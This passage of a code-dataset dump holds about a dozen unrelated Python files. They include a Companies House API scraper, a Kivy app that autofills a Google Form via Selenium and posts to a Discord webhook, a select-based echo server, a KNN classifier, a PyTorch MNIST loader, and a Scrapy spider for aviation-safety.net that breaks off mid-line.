x\n if 'maccs_df.p' not in os.listdir(os.getcwd()):\n x = dmso()\n x.obtain_data(maccs=True)\n pickle.dump(x.data, open('Fingerprints\\\\maccs_df.p', 'wb+'))\n\n del x\n if 'pubchem_df.p' not in os.listdir(os.getcwd()):\n x = dmso()\n x.obtain_data(pubchem=True)\n pickle.dump(x, open('pubchem_df.p', 'wb+'))\n\n\n\n\n\n\n\n\n\n","sub_path":"data_parse.py","file_name":"data_parse.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"46041364","text":"#!/usr/bin/python3\n\nimport pandas as pd\n\nfrom db.pg_constants import DB_CONFIG_SECTION, DB_CONFIG_ABS_PATH, DB_SCHEMA\nfrom db.pg_engine import MyDb\nfrom db.pg_tables import companyprofile_tables, psc_tables\nfrom db.pg_tables import officerlist_tables, appointmentlist_tables\nfrom utils.json_getter import Getter\nfrom utils.json_inserter import Inserter\nfrom utils.json_params import psc_params, companyprofile_params\nfrom utils.json_params import officerlist_params, appointmentlist_params\nfrom utils.cli import parser\nfrom utils.cli import file_is_csv_or_txt, optional_flags_collide, data_wont_fit_excel\nfrom utils.cli import file_contains_company_codes, url_ids_examples\nfrom utils.helpers import read_file_with_url_ids\n\n\n# cli arguments constants\nARGS = parser.parse_args()\n\nARGS_PARAMS = {'al' : {\"params\" : appointmentlist_params,\n \"create_stmts\": appointmentlist_tables,\n \"all_tables\" : [\"appointmentlist\",\n \"al_items\",\n \"al_items_address\",\n \"al_items_identification\",\n \"al_items_name_elements\",\n \"al_items_former_names\"]},\n 'ol' : {\"params\" : officerlist_params,\n \"create_stmts\": officerlist_tables,\n \"all_tables\" : [\"officerlist_http_errors\",\n \"officerlist_empty\",\n \"ol_items\",\n \"ol_items_address\",\n \"ol_items_identification\",\n \"ol_items_former_names\"]},\n 'psc': {\"params\" : psc_params,\n \"create_stmts\": psc_tables,\n \"all_tables\" : [\"psc_items\",\n 
\"psc_items_name_elements\",\n \"psc_items_identification\",\n \"psc_items_address\",\n \"psc_http_errors\",\n \"psc_items_natures_of_control\"]},\n 'cp' : {\"params\" : companyprofile_params,\n \"create_stmts\": companyprofile_tables,\n \"all_tables\" : [\"companyprofile\",\n \"cp_registered_office_address\",\n \"companyprofile_http_errors\",\n \"cp_sic_codes\",\n \"cp_previous_company_names\"]}}\n\nSELECT_ALL = \"select * from {};\"\n\n\n# supporting functions for main()\ndef make_url_list(args):\n \"\"\"\n given a file url runs checks for illegal cases and extracts the serializes content of the file to an iterable.\n \"\"\"\n\n if not file_is_csv_or_txt(args):\n raise ValueError(\"The file where you store the url_ids has to be in csv format.\")\n\n else:\n url_ids = read_file_with_url_ids(path=args.file)\n\n if data_wont_fit_excel(args, url_ids):\n raise ValueError(\"You won't be able to dump more than 1,048,576 rows in an excel file. \\n\"\n \"Please reduce the number of url_ids to be queried in the csv file containing them.\")\n\n return url_ids\n\n\ndef run_flags_check(args, url_ids):\n \"\"\"\n runs checks for all illegal cases when using the flags with prog.py\n \"\"\"\n\n if optional_flags_collide(args):\n raise ValueError(\"When passing the --al flag, other flags are automatically deactivated.\\n\"\n \"The url for the appointmentslist resource is different from the url required by\"\n \" psc, cp and ol.\\n\\n\" + url_ids_examples)\n\n if args.al is True and file_contains_company_codes(url_ids):\n\n raise ValueError(\"It looks lik you have provided a file containing company codes with the --al flag.\\n\"\n \"Company codes can only be used for --psc --ol and --cp flags.\\n\\n\"\n + url_ids_examples\n + \"Here's the list of url that were read (and cleaned) from the file.\\n\"\n + \" \\n\".join(url_ids[:5] if len(url_ids) > 5 else url_ids))\n\n if (args.psc is True or args.cp is True or args.ol is True) and not file_contains_company_codes(url_ids):\n\n raise 
ValueError(\"It looks lik you have provided a file which does not contain company codes.\\n\"\n \"Company codes are required for the --psc --ol and --cp flags.\\n\\n\"\n + url_ids_examples\n + \"Here's the list of url that were read (and cleaned) from the file.\\n\\n\"\n + \" \\n\".join(url_ids[:5] if len(url_ids) > 5 else url_ids))\n return None\n\n\ndef dump_to_excel(args, args_params, query, conn):\n \"\"\"\n iteratively apply SELECT * FROM {table} and creates Excel files, one table per Excel sheet.\n \"\"\"\n\n if args.excel is True:\n\n # build list of dictionaries {json flag: list of table names}.\n # all_tables_dicts = [{\"cp\" : [\"companyprofile\", \"cp_sic_codes\", ...]},\n # {\"ol\" : [\"ol_items\", \"ol_items_address\", ...]}, ...]\n all_tables_dicts = [{key: dict_[\"all_tables\"]} for key, dict_ in args_params.items() if vars(args)[key]]\n\n # What we are building to do with comprehension => df_name.to_excel(writer, sheet_name='some_table_name')\n for table_dict in all_tables_dicts:\n\n # build dictionary of dataframes read from pg.\n # {\"cp\" : [{\"companyprofile\": df}, {\"cp_sic_codes\": df},...]}\n df_hash = {k: [{table: pd.read_sql_query(query.format(table), conn) for table in v}]\n for k, v in table_dict.items()}\n\n # create list of writer instances.\n writers = [pd.ExcelWriter(DB_SCHEMA + '_' + k + '.xlsx', engine='xlsxwriter')\n for k, _ in df_hash.items()]\n\n # write to excel file.\n for writer, (k, v) in zip(writers, df_hash.items()):\n for dic in v:\n for tab, df in dic.items():\n df.to_excel(writer, sheet_name=tab)\n\n # Close the Pandas Excel writer and output the Excel file.\n writer.save()\n return\n\n\ndef main(args, args_params):\n\n # get url_ids from file and check flags passed by user.\n url_ids = make_url_list(args)\n run_flags_check(args, url_ids=url_ids)\n\n # create engine instance\n engine = MyDb(db_config_file=DB_CONFIG_ABS_PATH, db_section_name=DB_CONFIG_SECTION, schema=DB_SCHEMA)\n connection = engine.connect()\n\n # 
create list of create statements\n create_stmts = [dict_[\"create_stmts\"] for key, dict_ in args_params.items() if vars(args)[key]]\n\n # execute create statement\n _ = list(map(lambda x: engine.execute(mode=\"write\", query=x), create_stmts))\n\n # create list of params dictionaries.\n params = [dict_[\"params\"] for key, dict_ in args_params.items() if vars(args)[key]]\n\n # for al flag.\n if args.al:\n\n for appointmentlist_id in url_ids:\n extractor = Getter(appointmentlist_params, appointmentlist_id)\n json, _, _ = extractor.extract()\n inserter = Inserter(json=json, params=appointmentlist_params)\n inserter.unpack(uid_value=appointmentlist_id)\n\n # for all other flags (psc, ol, cp).\n if args.ol or args.psc or args.cp:\n\n for company_number in url_ids:\n for params_dict in params:\n extractor = Getter(json_params=params_dict, url_id=company_number)\n json, _, _ = extractor.extract()\n inserter = Inserter(json=json, params=params_dict)\n inserter.unpack(uid_value=company_number)\n\n if args.excel is True:\n dump_to_excel(args=ARGS, args_params=ARGS_PARAMS, query=SELECT_ALL, conn=connection)\n\nif __name__ == '__main__':\n\n main(args=ARGS, args_params=ARGS_PARAMS)\n","sub_path":"ch_api/prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"400716277","text":"from kivy.lang import Builder\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import StringProperty\nfrom kivy.properties import ObjectProperty\nfrom kivymd.app import MDApp\nfrom kivy.uix.screenmanager import Screen\nfrom kivymd.theming import ThemableBehavior\nfrom kivy.core.audio import SoundLoader\nfrom kivymd.uix.list import OneLineIconListItem, MDList\nfrom kivy.utils import get_color_from_hex\nfrom kivymd.theming import colors\nimport requests\nimport json\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.proxy import Proxy\nfrom 
selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.chrome.options import Options\nimport zipfile,os\nfrom kivy.uix.behaviors import ButtonBehavior\nfrom kivy.uix.image import Image\n\nclass ImageButton(ButtonBehavior, Image):\n pass\n\nKV = ''\nclass ContentNavigationDrawer(BoxLayout):\n userList =[]\n email = ObjectProperty(None)\n input_Fname =ObjectProperty(None)\n input_Lname=ObjectProperty(None)\n input_Street=ObjectProperty(None)\n input_City=ObjectProperty(None)\n input_State=ObjectProperty(None)\n input_Zip=ObjectProperty(None)\n webhook1 = ObjectProperty(None)\n def save_info(self):\n Fname = self.input_Fname.text\n Lname = self.input_Lname.text\n Street = self.input_Street.text\n City = self.input_City.text\n State = self.input_State.text\n Zip = self.input_Zip.text\n\n print(Fname,Lname,Street,City,State,Zip)\n\n def webhook(self):\n userWebhook = self.webhook1.text\n\n print(userWebhook)\n return userWebhook\n \n def webhookTest(self):\n\n self.url = self.webhook()# webhook url\n\n self.data = {}\n # for all params, see https://discordapp.com/developers/docs/resources/webhook#execute-webhook\n self.data[\"content\"] = \"Those who do not understand true pain can never understand true peace.\"\n self.data[\"username\"] = \"PAIN\"\n\n self.result = requests.post(self.url, data=json.dumps(self.data), headers={\"Content-Type\": \"application/json\"})\n\n try:\n self.result.raise_for_status()\n except requests.exceptions.HTTPError as err:\n print(err)\n else:\n print(\"Payload delivered successfully, code {}.\".format(self.result.status_code))\n\n\n\n\n\n def btn(self):\n text = self.email.text\n userList=text.split()\n self.email.text = \"\"\n print(userList)\n xPath_Email = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[1]/div/div[1]/input'\n xPath_Fname = 
'//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[2]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_Lname = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[3]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_Street = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[4]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_City = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[5]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_State = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_Zip = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[7]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_Size = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[8]/div/div/div[2]/div/div/span/div/div[8]/label/div/div[1]/div'\n xPath_Submit = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[3]/div[3]/div[1]/div'\n for email in userList:\n driver = webdriver.Chrome(executable_path='/Users/manuelpartida/Desktop/chromedriver')\n time.sleep(1)\n driver.get(str(\n \"https://docs.google.com/forms/d/e/1FAIpQLSeHfR7uI1tREQR_b2Hc-aNAb2_e377kgsqZXBcTYPfr4l_Z9w/viewform?embedded=true\"))\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Email).send_keys(email)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Fname).send_keys(Fname)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Lname).send_keys(Lname)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Street).send_keys(Street)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_City).send_keys(City)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_State).send_keys(State)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Zip).send_keys(Zip)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Size).click()\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Submit).click()\n time.sleep(30)\n print(\"All Done with \" + str(email) + \"!\")\n\n # self.submit(userList)\n pass\n\n\n #self.submit(userList)\n pass\nclass ItemDrawer(OneLineIconListItem):\n icon = StringProperty()\n\n\nclass 
DrawerList(ThemableBehavior, MDList):\n def set_color_item(self, instance_item):\n \"\"\"Called when tap on a menu item.\"\"\"\n\n # Set the color of the icon and text for the menu item.\n for item in self.children:\n if item.text_color == self.theme_cls.primary_color:\n item.text_color = self.theme_cls.text_color\n break\n instance_item.text_color = self.theme_cls.primary_color\n\n\nclass MainApp(MDApp, ContentNavigationDrawer):\n def build(self):\n self.theme_cls.primary_palette = 'LightGreen'\n self.theme_cls.theme_style = \"Dark\"\n return Builder.load_string(KV)\n\n def play_sound(self):\n self.sound = SoundLoader.load('Fallout V.A.T.S. sound effect.wav')\n self.sound.play()\n\n\n\n\n\n\n\nMainApp().run()","sub_path":"kivyGUIwithWebhook/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"283173202","text":"__author__ = 'kathiria'\r\n\r\n# server.py\r\n\r\nfrom socket import *\r\nfrom select import select\r\nfrom collections import deque\r\n\r\ntasks = deque()\r\nrecv_wait = {} # sock -> task\r\nsend_wait = {} # sock -> task\r\n\r\ndef run():\r\n while any([tasks, recv_wait, send_wait]):\r\n while not tasks:\r\n can_recv, can_send, _ = select(recv_wait, send_wait, [])\r\n for s in can_recv:\r\n tasks.append(recv_wait.pop(s))\r\n for s in can_send:\r\n tasks.append(send_wait.pop(s))\r\n task = tasks.popleft()\r\n try:\r\n reason, resource = next(task)\r\n if reason == 'recv':\r\n recv_wait[resource] = task\r\n elif reason == 'send':\r\n send_wait[resource] = task\r\n else:\r\n raise RuntimeError('Unknown reason %r' % reason)\r\n except StopIteration:\r\n print('Task done')\r\n\r\ndef tcp_server(address, handler):\r\n sock = socket(AF_INET, SOCK_STREAM)\r\n sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n sock.bind(address)\r\n sock.listen(5)\r\n while True:\r\n yield 'recv', sock\r\n client, addr = sock.accept()\r\n 
tasks.append(handler(client, addr))\r\n\r\ndef echo_handler(client, address):\r\n print('Connection from', address)\r\n while True:\r\n yield 'recv', client\r\n data = client.recv(1000)\r\n if not data:\r\n break\r\n yield 'send', client\r\n client.send(b'GOT:' + data)\r\n print('Connection closed')\r\n\r\nif __name__ == '__main__':\r\n tasks.append(tcp_server(('',25000), echo_handler))\r\n run()\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"184868841","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/lbusoni/git/palpao/test/calibration/in_memory_calibration_manager_test.py\n# Compiled at: 2018-10-06 05:15:43\n# Size of source mod 2**32: 997 bytes\nimport unittest, numpy as np\nfrom palpao.calibration.in_memory_calibration_manager import InMemoryCalibrationManager\nfrom palpao.types.modal_basis import ModalBasis\n\nclass InMemoryCalibrationManagerTest(unittest.TestCase):\n\n def setUp(self):\n self.calibMgr = InMemoryCalibrationManager()\n\n def testModalBasisStorage(self):\n tag = '20140909_110800'\n originalObject = ModalBasis(np.arange(8).reshape((4, 2)))\n self.calibMgr.saveModalBasis(tag, originalObject)\n storedObject = self.calibMgr.loadModalBasis(tag)\n self.assertEqual(storedObject, originalObject)\n\n def testZonalCommandStorage(self):\n tag = '20181222_110000'\n originalObject = np.arange(8)\n self.calibMgr.saveZonalCommand(tag, originalObject)\n storedObject = self.calibMgr.loadZonalCommand(tag)\n self.assertTrue(np.array_equal(storedObject, originalObject))\n\n\nif __name__ == '__main__':\n 
unittest.main()","sub_path":"pycfiles/palpao-0.16.0.tar/in_memory_calibration_manager_test.cpython-36.py","file_name":"in_memory_calibration_manager_test.cpython-36.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471896438","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n pip_services_echo.build.EchoFactory\r\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n Echo factory implementation\r\n \r\n :copyright: Digital Living Software Corp. 2015-2016, see AUTHORS for more details.\r\n :license: MIT, see LICENSE for more details.\r\n\"\"\"\r\n\r\nfrom pip_services_commons.build import IFactory\r\nfrom pip_services_commons.refer import Descriptor, IDescriptable\r\n\r\nfrom ..logic.EchoController import EchoControllerDescriptor, EchoController\r\nfrom ..clients.version1.EchoDirectClient import EchoDirectClientDescriptor, EchoDirectClient\r\nfrom ..clients.version1.EchoRestClient import EchoRestClientDescriptor, EchoRestClient\r\nfrom ..services.version1.EchoRestService import EchoRestServiceDescriptor, EchoRestService\r\n\r\nEchoFactoryDescriptor = Descriptor(\"pip-services-echo\", \"factory\", \"default\", \"1.0\")\r\n\r\nclass EchoFactory(object, IFactory, IDescriptable):\r\n\r\n def get_descriptor(self):\r\n return EchoFactoryDescriptor\r\n\r\n def can_create(self, locator):\r\n if isinstance(locator, Descriptor):\r\n if locator.match(EchoControllerDescriptor):\r\n return True\r\n if locator.match(EchoDirectClientDescriptor):\r\n return True\r\n if locator.match(EchoRestClientDescriptor):\r\n return True\r\n if locator.match(EchoRestServiceDescriptor):\r\n return True\r\n \r\n return False\r\n\r\n def create(self, locator):\r\n if isinstance(locator, Descriptor):\r\n if locator.match(EchoControllerDescriptor):\r\n return EchoController()\r\n if locator.match(EchoDirectClientDescriptor):\r\n return EchoDirectClient()\r\n if 
locator.match(EchoRestClientDescriptor):\r\n return EchoRestClient()\r\n if locator.match(EchoRestServiceDescriptor):\r\n return EchoRestService()\r\n \r\n return None\r\n","sub_path":"pip_services_echo/build/EchoFactory.py","file_name":"EchoFactory.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295395493","text":"#coding=utf-8\n'''\nCreated on 5 Apr 2019\n@author: pr4shan7 (प्रशांत)\n'''\n#https://projecteuler.net/thread=30#475\nimport math\nfsum = 0\nfor i in range (2, 354294):\n sum = 0\n for j in str (i):\n sum += math. pow (int (j), 5)\n if (sum == i):\n fsum += i\n print (i)\nprint (\"yo --> \" + str(fsum))\n","sub_path":"ProjectEuler/30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"66204042","text":"###############################################################################\n# ALGORITHM: Binary Search without recursion\n###############################################################################\n# Input: an array \"arr\"\n# a starting index \"low\"\n# an ending index \"high\"\n# a value to be searched \"key\"\n# Output: return -1 if key does not exist\n# return index of the key found in the array\n#\n# Example:\n#\n# INPUT:\n# arr = [3, 2, 9, 8, 5, 6, 0]\n# low = 1\n# high = 5\n# key = 8\n#\n# OUTPUT:\n# 3 (because arr[3] == 8)\n\ndef binarySearch(arr, low, high, key):\n # create a stack to mimic recursive strategy\n stack = []\n\n # push initial values\n stack.append(low)\n stack.append(high)\n\n while stack != []: # while stack is not empty\n high = stack.pop()\n low = stack.pop()\n mid = int((low + high) / 2)\n\n if arr[mid] == key:\n return mid\n\n # if target < mid node then we travel to left tree\n if key < arr[mid] and mid > low:\n # push lower index in first\n stack.append(low)\n # so higher index is always higher\n 
stack.append(mid - 1)\n\n # if target > mid node then we travel to right tree\n elif key > arr[mid] and high > mid:\n # push lower index in first\n stack.append(mid + 1)\n # so higher index is always higher\n stack.append(high)\n\n # if algorithm does not return within the loop then key does not exist\n return -1\n# END ALGORITHM\n###############################################################################\n\narr = [1, 2, 3, 4, 5, 6]\nprint(binarySearch(arr, 0, 5, 1))\nprint(binarySearch(arr, 0, 5, 10))\n","sub_path":"LeetCode/Library/lib_search.py","file_name":"lib_search.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220805317","text":"\"\"\"\n\tАвтор: Гришутенко Павел, группа№1, подгруппа№2\n\tРабота с исключениями\n\tВвод данных из json ввиде таблицы с обработкой исключительных ситуаций\n\t\n\tВвод данных из json парами ключ - значение с использованием\n импортируемого модуля json с применением обработки исключений\n\"\"\"\ntry:\n import json\nexcept ImportError:\n print(\"Ошибка при попытке импартировать модуль\")\n\ndef openFile(name):\n try:\n with open(name, \"r\") as read_file:\n try:\n data = json.load(read_file)\n except json.JSONDecodeError:\n print(\"не json\")\n \n return data\n \n except FileNotFoundError:\n print(\"не найден файл, проверте указанный путь к файлу\")\n return -2\n except IOError:\n print(\"невозможно прочитать/записать. 
(возможна ошибка прав доступа)\")\n return -3\n \n return -1\n\n\ndef printTable(data):\n table = ''\n try:\n for element in data:\n for item in element:\n try:\n print(item,' : ',element.get(item))\n table = table + str(item) \\\n + ' : ' + str(element.get(item)) + ' '\n except KeyError:\n print('Неверное взятие по ключу')\n \n return table\n \n except IndexError:\n print('Неверное итерирование по объекту')\n except:\n return -1\n\ndef readAndPrintTable(file_name):\n \n data = openFile(file_name)\n printTable(data)\n\n \n\nif __name__ == \"__main__\":\n readAndPrintTable(\"file.json\")\n\n","sub_path":"Grishutenko_lab_5_1.py","file_name":"Grishutenko_lab_5_1.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559938707","text":"import numpy as np\nfrom sortedcontainers import SortedList\n\nfrom util import get_data\nfrom datetime import datetime\n\n\nclass KNN(object):\n def __init__(self, k):\n self.k = k\n\n def fit(self, X, y):\n self.X = X\n self.y = y\n\n def preditc(self, X):\n y = np.zeros(len(X))\n for i, x in enumerate(X):\n sl = SortedList()\n for j, xt in enumerate(self.X):\n diff = x - xt\n d = diff.dot(diff) # squared distance\n if len(sl) < self.k:\n sl.add((d, self.y[j]))\n else:\n if d < sl[-1][0]:\n del sl[-1]\n sl.add((d, self.y[j]))\n\n votes = {} # dicts for votes to which class the point belongs\n for _, v in sl:\n votes[v] = votes.get(v, 0) + 1 # we flip the votes\n max_votes = 0\n max_votes_class = -1\n for v, count in dict.items(votes):\n if count > max_votes:\n max_votes = count\n max_votes_class = v\n\n y[i] = max_votes_class\n return y\n\n def score(self, X, Y):\n P = self.preditc(X)\n return np.mean(P == Y)\n\n\nif __name__ == '__main__':\n X, Y = get_data(2000)\n Ntrain = 1000\n Xtrain, Ytrain = X[: Ntrain], Y[:Ntrain]\n Xtest, Ytest = X[Ntrain:], Y[:Ntrain:]\n for k in (1, 2, 3, 4, 5):\n knn = KNN(k)\n t0 = datetime.now()\n 
knn.fit(Xtrain, Ytrain)\n print(\"traning time:\", (datetime.now() - t0))\n\n t0 = datetime.now()\n print(\"train accuracy:\", knn.score(Xtrain, Ytrain))\n print(\"Time to compute train accuracy:\", (datetime.now() - t0), \"Train size:\", len(Ytrain))\n\n print(\"test accuracy:\", knn.score(Xtrain, Ytrain))\n print(\"Time to compute test accuracy:\", (datetime.now() - t0), \"Test size:\", len(Ytest))\n","sub_path":"supervised_class/myknn.py","file_name":"myknn.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"357114222","text":"#!/usr/bin/env python3\n#\n# Copyright 2021 Graviti. Licensed under MIT License.\n#\n\n# pylint: disable=pointless-string-statement\n# pylint: disable=wrong-import-position\n# pylint: disable=import-error\n# type: ignore\n\n\"\"\"This is the example code for using dataset in Pytorch.\"\"\"\n\n\n\"\"\"Build a Segment class\"\"\"\nfrom PIL import Image\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import transforms\n\nfrom tensorbay import GAS\nfrom tensorbay.dataset import Dataset as TensorBayDataset\n\n\nclass MNISTSegment(Dataset):\n \"\"\"class for wrapping a MNIST segment.\"\"\"\n\n def __init__(self, gas, segment_name, transform):\n super().__init__()\n self.dataset = TensorBayDataset(\"MNIST\", gas)\n self.segment = self.dataset[segment_name]\n self.category_to_index = self.dataset.catalog.classification.get_category_to_index()\n self.transform = transform\n\n def __len__(self):\n return len(self.segment)\n\n def __getitem__(self, idx):\n data = self.segment[idx]\n with data.open() as fp:\n image_tensor = self.transform(Image.open(fp))\n\n return image_tensor, self.category_to_index[data.label.classification.category]\n # \"\"\"\"\"\"\n\n\n\"\"\"Build a dataloader and run it\"\"\"\nACCESS_KEY = \"Accesskey-*****\"\n\nto_tensor = transforms.ToTensor()\nnormalization = transforms.Normalize(mean=[0.485], 
std=[0.229])\nmy_transforms = transforms.Compose([to_tensor, normalization])\n\ntrain_segment = MNISTSegment(GAS(ACCESS_KEY), segment_name=\"train\", transform=my_transforms)\ntrain_dataloader = DataLoader(train_segment, batch_size=4, shuffle=True, num_workers=4)\n\nfor index, (image, label) in enumerate(train_dataloader):\n print(f\"{index}: {label}\")\n\"\"\"\"\"\"\n","sub_path":"docs/code/use_dataset_in_pytorch.py","file_name":"use_dataset_in_pytorch.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"33051489","text":"import numpy as np\nimport pandas as pd\nfrom math import ceil\n\n\nclass DataManager(object):\n def __init__(self, X, Y, mask_evaluate=None,\n mask_na=None, ids=None, batch_size=None,\n seq_length=None, hidden_units=None):\n self.data = {'X': X, 'Y': Y, 'mask_evaluate': mask_evaluate,\n 'mask_na': mask_na, 'ids': ids}\n self.X = X\n self.Y = Y\n self.batch_size = batch_size\n self.seq_length = seq_length\n self.mask_evaluate = mask_evaluate\n self.mask_na = mask_na\n self.hidden_units = hidden_units\n\n def get_num_features(self):\n return self.X.shape[2]\n '''\n def get_seq_length(self):\n return self.X.shape[1]-48\n '''\n def get_num_targets(self):\n if not len(self.Y.shape) > 2:\n return 1\n\n return self.Y.shape[2]\n\n def get_num_batches(self, batch_size):\n return int(ceil(self.data['X'].shape[0] / batch_size))\n\n def get_batch(self, batch, batch_size):\n batch_list = list()\n for data in [self.X, self.Y, self.mask_evaluate, self.mask_na]:\n if data is None:\n batch_list.append(data)\n else:\n start_idx = batch * batch_size\n end_idx = start_idx + batch_size\n batch_data = data[start_idx:end_idx]\n assert not np.any(np.isnan(batch_data))\n batch_list.append(batch_data)\n\n return batch_list\n\n def get_sequences(self, data, seq_num):\n data_list = list()\n for elem in data:\n s_ix = (self.seq_length+48)*seq_num\n e_ix = 
(self.seq_length+48)*(seq_num+1)\n data_list.append(elem[:, s_ix:e_ix, :])\n\n return data_list\n\n def get_num_sequences(self, seq_length):\n return ceil(self.X.shape[1]/(seq_length+48))\n\n def store_state(self, state):\n self.current_state, self.hidden_state = state\n\n def get_last_state(self):\n return self.current_state, self.hidden_state\n\n def get_empty_state(self):\n return [np.zeros((self.batch_size, self.hidden_units))] * 2\n\n def format_outputs(self, predictions_train, predictions_eval):\n predictions_train = predictions_train.reshape(\n self.batch_size, -1, self.get_num_features())\n predictions = np.concatenate((predictions_eval, predictions_train),\n axis=1)\n return predictions\n\n def create_estimates_dict(self, preds, targets):\n preds = pd.DataFrame(np.hstack(\n [preds.reshape([-1, self.get_num_targets()]),\n self.data['ids'].reshape([-1, 1]),\n self.data['mask_evaluate'][:, :, 0].reshape([-1, 1])]))\n targets = pd.DataFrame(np.hstack(\n [targets.reshape([-1, self.get_num_targets()]),\n self.data['ids'].reshape([-1, 1]),\n self.data['mask_evaluate'][:, :, 0].reshape([-1, 1])]))\n col_dict = {col: 'p'+str(col) for col in preds.columns[:6]}\n col_dict[6] = 'station'\n col_dict[7] = 'train'\n preds = preds.rename(columns=col_dict)\n targets = targets.rename(columns=col_dict)\n estimates_dict = {\n 'predictions': preds,\n 'targets': targets,\n }\n return estimates_dict\n\n","sub_path":"src/models/nn/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"435351592","text":"import string\nfrom scrapy import Request\nfrom scrapy import Spider\nfrom avia.items import AviaItem\nimport datetime\nimport re\n\n\nclass ToScrapeCSSSpider(Spider):\n name = \"asn\"\n\n base_url = 'https://aviation-safety.net/'\n start_urls = [\n 'https://aviation-safety.net/database/dblist.php?Year=2018',\n ]\n\n\n def parse(self, 
response):\n curr_page = None\n next_page = None\n curr_page = response.xpath('//div[@class=\"pagenumbers\"]/span[@class=\"current\"]/text()').extract_first()\n if curr_page is not None:\n next_page = response.xpath(\n '//div[@class=\"pagenumbers\"]//a[' + curr_page + ']/@href').extract_first()\n for href in response.xpath('//td[@class=\"list\"]/nobr/a'):\n request = response.follow(href, self.parse_avia)\n yield request\n if curr_page is not None and next_page is not None:\n yield Request(response.urljoin(next_page), self.parse)\n\n def parse_avia(self, response):\n print(response.url)\n asn_date = response.xpath('//tr/td[text()=\"Date:\"]/following::td[1]/text()').extract_first()\n asn_time = response.xpath('//tr/td[text()=\"Time:\"]/following::td[1]/text()').extract_first()\n asn_type = response.xpath('//tr/td[text()=\"Type:\"]/following::td[1]//a/text()').extract_first()\n asn_registration = response.xpath('//tr/td[text()=\"Registration:\"]/following::td[1]/text()').extract_first()\n asn_fatalities = response.xpath('//tr/td[text()=\"Total:\"]/following::td[1]/text()').extract_first()\n asn_location = ''.join(response.xpath('//tr/td[text()=\"Location:\"]/following::td[1]//text()').extract())\n\n\n locationclear = re.sub(\"^\\s+|\\n|\\r|\\s+$\", '', asn_location)\n #''.join(list(filter(lambda x: x in string.printable, asn_location)))\n\n weekday, day, monthclear, year = asn_date.split(' ')\n\n for old, new in [('January', '1'), ('February', '2'), ('March', '3'), ('April', '4'), ('May', '5'),\n ('June', '6'),\n ('July', '7'), ('August', '8'), ('September', '9'), ('October', '10'), ('November', '11'),\n ('December', '12')]:\n monthclear = monthclear.replace(old, new)\n\n if asn_time is not None:\n timeclear = ''.join(\n list(filter(lambda x: x if x in [':', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'] else '',\n asn_time)))\n else:\n timeclear = '00:00'\n\n hour, min = timeclear.split(':')\n datetimeclear = 